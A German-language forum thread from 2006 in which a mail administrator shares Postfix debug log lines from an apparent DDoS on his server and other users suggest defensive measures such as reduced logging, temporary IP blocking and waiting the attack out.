Dec  6 16:50:40 mail postfix/smtpd[56782]: match_list_match: 66.232.138.26: no match
Dec  6 16:50:40 mail postfix/smtpd[56782]: generic_checks: name=permit_mynetworks status=0
Dec  6 16:50:40 mail postfix/smtpd[56782]: generic_checks: name=reject_unauth_destination
Dec  6 16:50:40 mail postfix/smtpd[56782]: reject_unauth_destination: [email]vprimarily@XXXXXXX.com[/email]
Dec  6 16:50:40 mail postfix/smtpd[56782]: permit_auth_destination: [email]vprimarily@XXXXXXX.com[/email]
Dec  6 16:50:40 mail postfix/smtpd[56782]: ctable_locate: leave existing entry key [email]vprimarily@XXXXXXX.com[/email]
Dec  6 16:50:40 mail postfix/smtpd[56782]: generic_checks: name=reject_unauth_destination status=0
Dec  6 16:50:40 mail postfix/smtpd[56782]: generic_checks: name=reject_non_fqdn_sender
Dec  6 16:50:40 mail postfix/smtpd[56782]: generic_checks: name=reject_non_fqdn_sender status=0
Dec  6 16:50:40 mail postfix/smtpd[56782]: generic_checks: name=reject_non_fqdn_recipient
Dec  6 16:50:40 mail postfix/smtpd[56782]: reject_non_fqdn_address: [email]vprimarily@XXXXXXX.com[/email]
Dec  6 16:50:40 mail postfix/smtpd[56782]: generic_checks: name=reject_non_fqdn_recipient status=0
Dec  6 16:50:40 mail postfix/smtpd[56782]: generic_checks: name=reject_unknown_recipient_domain
Dec  6 16:50:40 mail postfix/smtpd[56782]: reject_unknown_address: [email]vprimarily@XXXXXXX.com[/email]
Dec  6 16:50:40 mail postfix/smtpd[56782]: ctable_locate: leave existing entry key [email]vprimarily@XXXXXXX.com[/email]
Dec  6 16:50:40 mail postfix/smtpd[56782]: generic_checks: name=reject_unknown_recipient_domain status=0
Dec  6 16:50:40 mail postfix/smtpd[56782]: generic_checks: name=reject_non_fqdn_hostname
Dec  6 16:50:40 mail postfix/smtpd[56782]: reject_non_fqdn_hostname: lsh810.siteprotect.co.kr
Dec  6 16:50:40 mail postfix/smtpd[56782]: generic_checks: name=reject_non_fqdn_hostname status=0
Dec  6 16:50:40 mail postfix/smtpd[56782]: generic_checks: name=reject_invalid_hostname

------------------------------------------snap---------------------------

inst0000 · Dec 6, 2006

Logfile im Anhang

Thorsten said:
Hallo!
Hast du mal einen Logauszug dieser Attacken?

mfG
Thorsten

Wenn ich es hinbringe.

amnesie · Dec 6, 2006

Dreh mal massiv das Logging runter, dann tritt das ganze nicht so sehr auf die Performance.

Aber gegen das blosse Aufbauen einer TCP-Verbindung hilft nix, eher ein Skript, welches die IPs (die so auffällig sind) aus dem Maillog auswertet, sie samt Zeitstempel in eine Tabelle steckt und dann ein paar Stunden blockiert.

Wenn deine Mails eine "Ausweichmöglichkeit" haben (also 2nd MX), dann könntest du mal probieren, den smtpd einfach ein paar Stunden abzuschalten und das ganze auszusitzen.

inst0000 · Dec 6, 2006

amnesie said:
Dreh mal massiv das Logging runter, dann tritt das ganze nicht so sehr auf die Performance.

Aber gegen das blosse Aufbauen einer TCP-Verbindung hilft nix, eher ein Skript, welches die IPs (die so auffällig sind) aus dem Maillog auswertet, sie samt Zeitstempel in eine Tabelle steckt und dann ein paar Stunden blockiert.

Wenn deine Mails eine "Ausweichmöglichkeit" haben (also 2nd MX), dann könntest du mal probieren, den smtpd einfach ein paar Stunden abzuschalten und das ganze auszusitzen.

Die Idee mit dem "Ausssitzen" hatte ich schon. Von Montag Nachmittag bis
Dienstag früh habe ich den Mailservice gestoppt. Dann ist der Sturm abgeebbt
und heute früh gings wieder richtig los.

Das Problem ist: Ich vermute es handelt sich um 10tausende Rechner.
Da nippelt wahrscheinlich sogar die Firewall beim Sperrversuch ab *lol*.
6000 Adressen habe ich schon gesperrt aber für jede gesperrte kommen
3 neue dazu.

Ich setzte gerade einen neuen Mailserver mit neuer Domain auf, was soll man
machen

Sinepp · Dec 7, 2006

Ich frage mich, was Du hostest, dass sich jemand derartig viel Aufwand macht.

Gruß
Sinepp

inst0000 · Dec 11, 2006

Nix besonderes

Sinepp said:
Ich frage mich, was Du hostest, dass sich jemand derartig viel Aufwand macht.

Gruß
Sinepp

Die Frage, warum sich jemand soviel Aufwand macht, würde mich auch
brennend interessieren. Nach Rücksprache mit dem LKA bekommt man nach
so einer Attacke ein Schreiben mit der "Information" wie man gegen den
"Einwurf von Münzen" derartige "Ausfälle" verhindern kann. Bis jetzt kam
aber nix.

Sinepp · Dec 11, 2006

Vielleicht hat sich da jemand in der IP Adresse vertippt.

Oder ein Lehrbuch hat als Fallbeispiel eine zufällige IP Adresse genommen und nun versuchen sich diverse Studenten

Naja, wer den Schaden hat braucht für den Spott nicht zu sorgen...

Ist denn mittlerweile Ruhe?

Grüße
Sinepp

inst0000 · Dec 12, 2006

So etwas in der Richtung wird es wohl sein

Unsere Firma ist im asiatischen Raum ziemlich aktiv. Vielleicht sind wir dort
jemandem "aufgestossen" obwohl mir die Sache mit dem Lehrbuch besser
gefällt

Mittlerweile gammeln noch so ein paar verlorene Prozesse rum - nix was den
Betrieb stören würde. Nach 3 Tagen war praktisch Schluss.

ddos Attacke auf Postfix Server

inst0000

New Member

Sinepp

Registered User

amnesie

New Member

inst0000

New Member

inst0000

New Member

Thorsten

SSF Facilitymanagement

DjTom-i

Member

inst0000

New Member

inst0000

New Member

Attachments

amnesie

New Member

inst0000

New Member

Sinepp

Registered User

inst0000

New Member

Sinepp

Registered User

inst0000

New Member

We value your privacy